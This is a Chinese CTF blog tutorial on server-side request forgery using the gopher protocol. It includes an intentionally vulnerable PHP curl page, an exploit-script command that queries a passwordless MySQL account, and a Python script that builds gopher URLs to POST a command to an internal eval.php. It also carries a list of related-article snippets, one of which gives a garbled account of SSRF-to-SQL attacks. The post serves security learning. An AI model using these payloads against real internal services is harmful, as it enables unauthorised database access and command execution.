SSRF利用 Gopher |Gopher攻击mysql及内网

最新推荐文章于 2024-09-13 20:39:16 发布
最新推荐文章于 2024-09-13 20:39:16 发布
阅读量5.7k 收藏 13
点赞数 2
分类专栏: CTF知识点总结 文章标签: 数据库 http 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crisprx/article/details/104251284
版权

SSRF利用 Gopher

0X01 前言

研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议之SSRF利用的相关总结。

参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470

0X02 概述

SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞,一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。

Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。

Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。在ssrf时常常会用到gopher协议构造post包来攻击内网应用。其实构造方法很简单,与http协议很类似。

不同的点在于gopher协议没有默认端口,所以需要指定web端口,而且需要指定post方法。回车换行使用%0d%0a。注意post参数之间的&分隔符也要进行url编码

基本协议格式URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流

有关gopher利用的一些小细节:

  • 细节一
    在这里插入图片描述curl -V查看curl是否支持gopher协议nc发现数据换行了,但是只显示了ello,而h则消失了,因此在这里我们以后构造gopher需要在在之前加入_来充当那个消失的字符,即:
    在这里插入图片描述
  • 细节二
    注意如果在地址栏利用payload时要再进行一次url编码。

环境搭建:apache+php5.4

推荐用PHPstudy搭建环境,用此代码用来模拟SSRF:

<?php
$ch = curl_init(); // 创建一个新cURL资源
curl_setopt($ch, CURLOPT_URL, $_GET['url']); // 设置URL和相应的选项
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch); // 抓取URL并把它传递给浏览器
curl_close($ch); // 关闭cURL资源,并且释放系统资源
?>

可以看到:
在这里插入图片描述

gopher攻击Mysql

MySQL数据库用户认证采用的是挑战/应答的方式,服务器生成该挑战数(scramble)并发送给客户端,客户端用挑战数加密密码后返回相应结果,然后服务器检查是否与预期的结果相同,从而完成用户认证的过程。

登录时需要用服务器发来的scramble加密密码,但是当数据库用户密码为空时,加密后的密文也为空。client给server发的认证包就是相对固定的了。这样就无需交互,可以通过gopher协议来发送

mysql数据包前需要加一个四字节的包头。前三个字节代表包的长度,第四个字节代表包序,在一次完整的请求/响应交互过程中,用于保证消息顺序的正确,每次客户端发起请求时,序号值都会从0开始计算。 在这里插入图片描述这里我们本地搭建的数据库的设立了一个curl用户,且赋予其权限,允许空密码登录:

CREATE USER 'curl'@'localhost';
GRANT ALL ON *.* TO 'curl'@'localhost';

在这里插入图片描述我们如何通过localhost/index.php?url=来攻击mysql呢?这里是构造了gopher来攻击mysql:
https://github.com/FoolMitAh/mysql_gopher_attack
github上有一个gopher攻击mysql的python脚本,既然我们知道了curl用户,那么:

python exploit.py -u curl -d information_schema -p "" -P "select * from flag" -v -c

参数说明:

-u 指定用户
-d 指定数据库,这里我们可以通过information_schema来获取所有的数据库
-P 指定sql语句

抓取的mysql通信数据包:
在这里插入图片描述其实也就得到了数据库:infoemtion_schema、challenges、dwva、test等等。
具体的回显:
在这里插入图片描述所以我们最终可以通过sql查询得到flag(本地把它放在了test库下的flag表中)
在这里插入图片描述

攻击内网

下面通过一个本地搭建的ctf题查看:
/index.php源代码为:

<?php
$ch = curl_init(); // 创建一个新cURL资源
curl_setopt($ch, CURLOPT_URL, $_GET['url']); // 设置URL和相应的选项
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch); // 抓取URL并把它传递给浏览器
curl_close($ch); // 关闭cURL资源,并且释放系统资源
?>
<!--hint:eval.php-->

提示eval.php,提示要POST ctf参数在这里插入图片描述这里便利用了gopher进行SSRF,抓取POST的数据包并修改host为127.0.0.1 :
在这里插入图片描述得到其所有原始的hex数据后构造gopher进行利用,在这里因为是用过url传入,需要进行url编码:

# -*- coding: UTF-8 -*-
#coding: utf-8
from urllib import quote




s='504F5354202F6576616C2E70687020485454502F312E310D0A486F73743A203132372E302E302E310D0A557365722D4167656E743A204D6F7A696C6C612F352E30202857696E646F7773204E542031302E303B2057696E36343B207836343B2072763A36392E3029204765636B6F2F32303130303130312046697265666F782F36392E300D0A4163636570743A202A2F2A0D0A4163636570742D4C616E67756167653A207A682D434E2C7A683B713D302E382C7A682D54573B713D302E372C7A682D484B3B713D302E352C656E2D55533B713D302E332C656E3B713D302E320D0A436F6E74656E742D547970653A206170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F6465640D0A43616368653A206E6F2D63616368650D0A4F726967696E3A206D6F7A2D657874656E73696F6E3A2F2F31633865373436302D653166312D346165662D386535352D3334653538383032393231610D0A436F6E74656E742D4C656E6774683A2031300D0A436F6E6E656374696F6E3A20636C6F73650D0A0D0A6374663D77686F616D69'
len=len(s)
p=''
for i in range(len)[::2]:
    p+=quote(chr(int(s[i:i+2],16)))
#print(p)

#若url浏览器访问需再编码一次,curl可直接访问
urlp = quote(p)
urlp = 'gopher://127.0.0.1:80/_' + urlp
print(urlp)

即将其进行url编码:
在这里插入图片描述(如果是在url中还需进行一次编码,curl则不用进行编码)
成功SSRF执行命令whoami在这里插入图片描述

Crispr-bupt
关注
专栏目录
【网络安全 | HTTPgopher协议原理、语法及利用总结
等风来
08-01 9795
Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。
手把手带你用 SSRF 打穿内网
weixin_50464560的博客
05-13 2835
靶场拓扑设计首先来看下本次靶场的设计拓扑图: 先理清一下攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080,此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 本场景基本上覆盖了 SSRF 常见的攻击场景,实际上 SSRF 还可以攻击 FTP、Zabbix、Memcached 等应用,由于时间和精力有限,先挖个坑,以后有机会的话再补充完善这套 SSRF 攻击场景的。 x.x.x.x
你真的会利用SSRF漏洞?一文教你如何利用SSRF配合gopher协议拿下服务器
weixin_61951055的博客
04-23 805
通过服务器的SSRF漏洞利用gopher协议攻击redis数据库直接拿下数据库
SSRF漏洞】——gopherus工具伪造
最新发布
qq_74350234的博客
09-13 951
Gopherus是一个专为生成Gopher协议Payload的工具,通过构造特定的Gopher协议数据包,攻击者能够利用SSRF漏洞对内网资源进行访问,甚至可能进一步执行远程代码(Remote Code Execution,RCE)。
gopher攻击mysql_gopher 协议在SSRF 中的一些利用
weixin_42131785的博客
02-05 1187
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
mysql is fashion ctf_从一道CTF题目看Gopher攻击MySql
weixin_29032337的博客
01-20 240
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
ssrf打mysql_浅析SSRF认证攻击Redis
weixin_31134719的博客
02-22 226
原标题:浅析SSRF认证攻击Redis 前段时间evoA师傅提到了SSRF可以攻击有密码认证的Redis服务,网上的文章大部分都是未授权打Redis,而有关SSRF认证攻击Redis的文章很少,在这里简单分析一下,如有错误还望斧正。SSRFSSRF漏洞的原理是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务,我们可以用其探测内网信息、攻击内网应用、穿透防火墙、读取任意文件等。这里我们演示的...
mysql 远程攻击_gopher 协议攻击内网 mysql
weixin_29480231的博客
01-19 295
本地测试一开始使用的是 centos 6.5 的虚拟机后来发现我的 curl 为 7.19.7 版本,不支持 gopher 协议但是都失败了..如果有 centos 6.5 升级 curl 版本成功的请告诉我!环境搭建失败了就只能慢慢的搭环境了,一时脑抽想体验一下 docker-compose,就去装了 dnmp(docker+nginx+mysql+php) 很棒的一个项目不过默认 php_cu...
从一道CTF题目看Gopher攻击MySql(转载)
qwzf
07-18 1005
转载自FreeBuf平台 作者:undef1ned 前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,解压后的目录不解析php。通过上传一个含有符号链接文件的压缩
ssrf dict MySQL_ssrf漏洞利用(内网探测、打redis)
weixin_35678674的博客
02-22 1194
摘要:存在ssrf漏洞的站点主要利用四个协议,分别是http、file、gopher、dict协议。file协议拿来进行本地文件的读取,http协议拿来进行内网的ip扫描、端口探测,如果探测到6379端口,那么可以利用httpgopher、dict这几个协议来打开放6379端口的redis服务(一般开放了这个端口的是redis服务),原理是利用他们以目标机的身份执行对开启redis服务的内网机执...
SSRF攻击姿势汇总
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 1378
前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持写文章总结的习惯啊。 最近笔者在看讲SSRF、protocol smuggle、HTTP request smuggle、SSO任意跳转,Url解析不一致导致的安全问题。一方面由衷地佩服演讲人的脑洞和安全功底,另外一方面又在笔者又在反思,如果是我,我会怎么去发现此类漏洞,解决方案又是什么。本文不同于各大公众号千篇一律的复现、验证漏洞文章,会加入自己的思考和心得。鉴于文章会存在一些敏感内容,笔者会本着在删除敏感内容的前提下,尽量让大家都能看懂的标准
34C3 CTF Web题 extract0r Writeup (软链接实现任意读文件/目录+SSRF绕过内网ip黑名单+Gopher攻击MySQL+zip文件构造)
keyball123的博客
03-28 1万+
extract0r – A web challenge from hxp 34C3 CTF https://ctftime.org/event/544 题目部署 本地搭建: https://github.com/shimmeris/CTF-Web-Challenges/tree/master/SSRF/34c3-2017-extract0r 在34c3-2017-extract0r目录下执...
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 715
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
2021-08-16 CTFer成长之路-SSRF漏洞-Gopher协议攻击mysql
热门推荐
时光隧道
08-16 4万+
1.tcpdump进行抓包,并将抓到的流量写入/pcap/mysql.pcap文件 2.开始抓包后,登录MySQL服务器进行查询操作(生成数据包) 3.然后使用wireshark打开/pcap/mysql.pcap数据包,过滤MySQL,再随便选择一个包并单击右键,在弹出的快捷菜单中选择“追踪流 → TCP流”,过滤出客户端到服务端的数据包,最后将格式调整为HEX转储 此时便获得了从客户端到服务端并执行命令完整流程的数据包,然后将其进行URL编码,得到如下数据: ...
gopher攻击mysql_CTFweb类型(二十七)gophermysql利用及例题讲解
weixin_42462007的博客
02-05 335
本次来讲一下gopher协议在MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议的利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL利用:我这边创建一个demo,简单了...
SSRF漏洞理解进阶&SSRF+gopher内网(redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8850
SSRF漏洞理解进阶&SSRF+gopher内网(redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
gophermysql利用_从一道CTF题目看Gopher攻击MySql
weixin_32394247的博客
02-23 122
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0×00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
php mysql盲注_[题目]记一次利用gopher内网mysql盲注
weixin_42560991的博客
01-28 190
进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopherssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的...
gophermysql利用及例题讲解
DKPT的博客
12-06 192
查询语句(url编码)+url编码的登入请求。
如何利用ssrf 进行mysql攻击
05-23
SSRF(Server-Side Request Forgery)是一种攻击技术,利用它可以让攻击者在目标服务器上执行任意请求,包括访问本地服务和第三方服务。下面介绍一种利用SSRF进行MySQL攻击的方法。 1. 找到一个存在SSRF漏洞的网站,构造一个包含攻击代码的请求,将请求发送到目标服务器。 2. 在请求中,指定MySQL协议的IP地址和端口号,并且在参数中构造一个恶意的SQL语句,例如:SELECT * FROM users WHERE id=1; DROP TABLE users;。 3. 当目标服务器接收到请求后,会执行恶意的SQL语句,导致数据库中的用户表被删除。 需要注意的是,这种攻击方法需要满足以下条件: - 目标服务器存在SSRF漏洞; - 目标服务器能够访问MySQL数据库; - 目标服务器的MySQL数据库存在安全漏洞,例如允许执行任意SQL语句。 因此,在防御SSRF攻击时,我们需要采取一系列措施,包括限制服务器访问权限、过滤输入参数、使用白名单等。同时,对于MySQL数据库,我们需要加强访问控制、定期更新补丁、合理使用权限等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值